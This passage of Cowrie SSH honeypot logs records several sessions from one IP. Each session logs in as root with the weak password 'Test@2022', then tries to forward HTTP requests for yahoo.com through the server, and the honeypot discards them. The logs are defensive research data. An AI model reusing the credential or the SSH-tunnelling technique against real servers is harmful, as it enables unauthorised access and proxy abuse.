es128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.510415Z","src_ip":"213.209.150.239","session":"5df970666653"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.744330Z","src_ip":"213.209.150.239","session":"5df970666653"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":26334,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:26334","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.792758Z","session":"5df970666653"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.839794Z","src_ip":"213.209.150.239","session":"5df970666653"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":15809,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15809","sensor":"my-vps","timestamp":"2025-08-26T01:06:46.977343Z","session":"5df970666653"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.024560Z","src_ip":"213.209.150.239","session":"5df970666653"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.072098Z","src_ip":"213.209.150.239","session":"5df970666653"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43782,"dst_ip":"1.2.3.4","dst_port":22,"session":"e206cd1e59b7","protocol":"ssh","message":"New connection: 213.209.150.239:43782 (1.2.3.4:22) [session: e206cd1e59b7]","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.118152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.119237Z","src_ip":"213.209.150.239","session":"e206cd1e59b7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.166148Z","src_ip":"213.209.150.239","session":"e206cd1e59b7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.400327Z","src_ip":"213.209.150.239","session":"e206cd1e59b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":14607,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:14607","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.448246Z","session":"e206cd1e59b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.495521Z","src_ip":"213.209.150.239","session":"e206cd1e59b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":9079,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:9079","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.633352Z","session":"e206cd1e59b7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.680432Z","src_ip":"213.209.150.239","session":"e206cd1e59b7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.728645Z","src_ip":"213.209.150.239","session":"e206cd1e59b7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43841,"dst_ip":"1.2.3.4","dst_port":22,"session":"365429b2766b","protocol":"ssh","message":"New connection: 213.209.150.239:43841 (1.2.3.4:22) [session: 365429b2766b]","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.774865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.775939Z","src_ip":"213.209.150.239","session":"365429b2766b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:47.823200Z","src_ip":"213.209.150.239","session":"365429b2766b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.058261Z","src_ip":"213.209.150.239","session":"365429b2766b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15245,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15245","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.106693Z","session":"365429b2766b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.153986Z","src_ip":"213.209.150.239","session":"365429b2766b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26259,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26259","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.289535Z","session":"365429b2766b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.336786Z","src_ip":"213.209.150.239","session":"365429b2766b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.385248Z","src_ip":"213.209.150.239","session":"365429b2766b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43901,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec47615c3cf","protocol":"ssh","message":"New connection: 213.209.150.239:43901 (1.2.3.4:22) [session: 7ec47615c3cf]","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.440906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.450009Z","src_ip":"213.209.150.239","session":"7ec47615c3cf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.497754Z","src_ip":"213.209.150.239","session":"7ec47615c3cf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.779778Z","src_ip":"213.209.150.239","session":"7ec47615c3cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5783,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5783","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.837409Z","session":"7ec47615c3cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:48.894177Z","src_ip":"213.209.150.239","session":"7ec47615c3cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26213,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26213","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.051164Z","session":"7ec47615c3cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.107931Z","src_ip":"213.209.150.239","session":"7ec47615c3cf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.165313Z","src_ip":"213.209.150.239","session":"7ec47615c3cf"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":43966,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f9c39a20b5c","protocol":"ssh","message":"New connection: 213.209.150.239:43966 (1.2.3.4:22) [session: 5f9c39a20b5c]","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.211444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.221613Z","src_ip":"213.209.150.239","session":"5f9c39a20b5c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.258821Z","src_ip":"213.209.150.239","session":"5f9c39a20b5c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.493644Z","src_ip":"213.209.150.239","session":"5f9c39a20b5c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16924,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16924","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.542106Z","session":"5f9c39a20b5c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.589221Z","src_ip":"213.209.150.239","session":"5f9c39a20b5c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":26990,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:26990","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.733479Z","session":"5f9c39a20b5c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.780536Z","src_ip":"213.209.150.239","session":"5f9c39a20b5c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.828589Z","src_ip":"213.209.150.239","session":"5f9c39a20b5c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44011,"dst_ip":"1.2.3.4","dst_port":22,"session":"b84ff07e8724","protocol":"ssh","message":"New connection: 213.209.150.239:44011 (1.2.3.4:22) [session: b84ff07e8724]","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.874866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.875516Z","src_ip":"213.209.150.239","session":"b84ff07e8724"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:49.922758Z","src_ip":"213.209.150.239","session":"b84ff07e8724"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.158537Z","src_ip":"213.209.150.239","session":"b84ff07e8724"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":16589,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:16589","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.206773Z","session":"b84ff07e8724"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.254092Z","src_ip":"213.209.150.239","session":"b84ff07e8724"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20758,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20758","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.389502Z","session":"b84ff07e8724"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.436651Z","src_ip":"213.209.150.239","session":"b84ff07e8724"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:50.484704Z","src_ip":"213.209.150.239","session":"b84ff07e8724"}
